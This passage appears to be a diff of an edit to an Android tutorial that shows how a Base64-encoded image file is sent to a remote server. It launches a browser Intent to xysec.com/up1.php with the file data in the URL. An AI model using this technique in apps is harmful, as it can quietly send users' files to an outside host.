menu

 This returns the Base64 encoded version of the image file.
 What about sending this file to a remote server?

-Above codes contains the file data in a string called ret which needs to be uploaded to the server using GET method.
+The above codes contain the file data in a string called ret, which needs to be uploaded to the server using the GET method.
 This is the simplest part!
 The following snippet does the job beautifully:

 startActivity(new Intent(Intent.ACTION_VIEW,Uri.parse("http://xysec.com/up1.php?u="+ret)));